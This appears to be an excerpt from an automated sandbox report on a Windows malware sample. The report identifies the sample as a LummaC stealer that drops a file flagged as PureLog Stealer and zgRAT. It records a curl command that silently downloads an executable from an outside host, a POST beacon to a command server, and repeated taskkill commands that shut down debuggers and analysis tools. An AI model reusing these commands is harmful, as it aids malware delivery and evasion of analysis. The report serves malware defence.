2024-09-30 16:20:27 UTC	3768	IN	Data Raw: 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 63 6f 6e 74 65 6e 74 20 22 3e 0d 0a Data Ascii: eLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></div></div><div class="profile_content ">
2024-09-30 16:20:27 UTC	12	IN	Data Raw: 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: dy></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.10	49733	172.67.197.40	443	3768	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 16:20:28 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: offeviablwke.site
2024-09-30 16:20:28 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-30 16:20:28 UTC	780	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 16:20:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=43olhp0c9mnsn3fsvol9u4tlt8; expires=Fri, 24 Jan 2025 10:07:07 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d3d%2Fh23c5NNUju4Q0Z6PfPrKaBx3mvQ%2FIl0IWRHAfOtHEsyBwXcbKj%2FVEL%2BvwnUsJXhHKvqwdghQMdaIF%2Fxok3lSbKktV2BcW0cXTuc7RTQHnBHCXLJSuciR%2Bsi8Tdrx5tep2A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb58a5c5d310f5d-EWR
2024-09-30 16:20:28 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-30 16:20:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	12:19:55
Start date:	30/09/2024
Path:	C:\Users\user\Desktop\UY9hUZn4CQ.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\UY9hUZn4CQ.exe"
Imagebase:	0x7ff60c470000
File size:	101'888 bytes
MD5 hash:	206ADDAC1B15931A5A6F35222ECED8C8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	4
Start time:	12:19:56
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c cls
Imagebase:	0x7ff76c690000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	13
Start time:	12:19:57
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
Imagebase:	0x7ff76c690000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	15
Start time:	12:19:58
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
Imagebase:	0x7ff76c690000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	19
Start time:	12:19:59
Start date:	30/09/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /f /im HTTPDebuggerSvc.exe
Imagebase:	0x7ff6cc650000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	22
Start time:	12:20:01
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
Imagebase:	0x7ff76c690000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	26
Start time:	12:20:04
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
Imagebase:	0x7ff76c690000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	30
Start time:	12:20:05
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
Imagebase:	0x7ff76c690000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	31
Start time:	12:20:06
Start date:	30/09/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
Imagebase:	0x7ff79fbb0000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	33
Start time:	12:20:07
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
Imagebase:	0x7ff76c690000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	35
Start time:	12:20:10
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
Imagebase:	0x7ff76c690000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	39
Start time:	12:20:11
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
Imagebase:	0x7ff76c690000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	45
Start time:	12:20:12
Start date:	30/09/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -pss -s 460 -p 2084 -ip 2084
Imagebase:	0x7ff6d4a60000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	46
Start time:	12:20:13
Start date:	30/09/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 2084 -s 380
Imagebase:	0x7ff6d4a60000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	48
Start time:	12:20:14
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
Imagebase:	0x7ff76c690000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	49
Start time:	12:20:15
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
Imagebase:	0x7ff76c690000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	52
Start time:	12:20:16
Start date:	30/09/2024
Path:	C:\Windows\Speech\kdmapper.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Speech\kdmapper.exe"
Imagebase:	0xec0000
File size:	2'284'739 bytes
MD5 hash:	C85ABE0E8C3C4D4C5044AEF6422B8218
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000034.00000003.1471509432.0000000006378000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000034.00000003.1474597690.0000000004C13000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 68%, ReversingLabs
Has exited:	true

Target ID:	58
Start time:	12:20:17
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T >nul 2>&1
Imagebase:	0x7ff76c690000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	61
Start time:	12:20:18
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
Imagebase:	0x7ff76c690000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	63
Start time:	12:20:19
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T >nul 2>&1
Imagebase:	0x7ff76c690000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	70
Start time:	12:20:20
Start date:	30/09/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /FI "IMAGENAME eq processhacker" /IM /F /T
Imagebase:	0x7ff6cc650000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report UY9hUZn4CQ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Edge\61a52ddc9dd915

C:\Edge\L6lFlVnd0szYUYb26bZc.vbe

C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat

C:\Edge\msedge.exe

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_imxyvi.exe_4847b766389ebd31bb3e56641547db635cd224a7_2d59ba1d_1c2bdfad-4e5a-40bc-80fd-2f19c1fc3ea5\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER80B2.tmp.dmp

Windows Analysis Report
UY9hUZn4CQ.exe

Target ID:	73
Start time:	12:20:21
Start date:	30/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Imagebase:	0xac0000
File size:	43'016 bytes
MD5 hash:	5D1D74198D75640E889F0A577BBF31FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	78
Start time:	12:20:22
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
Imagebase:	0x7ff76c690000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	82
Start time:	12:20:23
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
Imagebase:	0x7ff76c690000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	86
Start time:	12:20:24
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T >nul 2>&1
Imagebase:	0x7ff76c690000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	94
Start time:	12:20:26
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
Imagebase:	0x7ff76c690000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	103
Start time:	12:20:27
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
Imagebase:	0x7ff76c690000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	108
Start time:	12:20:28
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
Imagebase:	0x7ff76c690000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	112
Start time:	12:20:29
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
Imagebase:	0x7ff76c690000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	122
Start time:	12:20:30
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles" /IM /F /T >nul 2>&1
Imagebase:	0x7ff76c690000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	128
Start time:	12:20:31
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
Imagebase:	0x7ff76c690000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true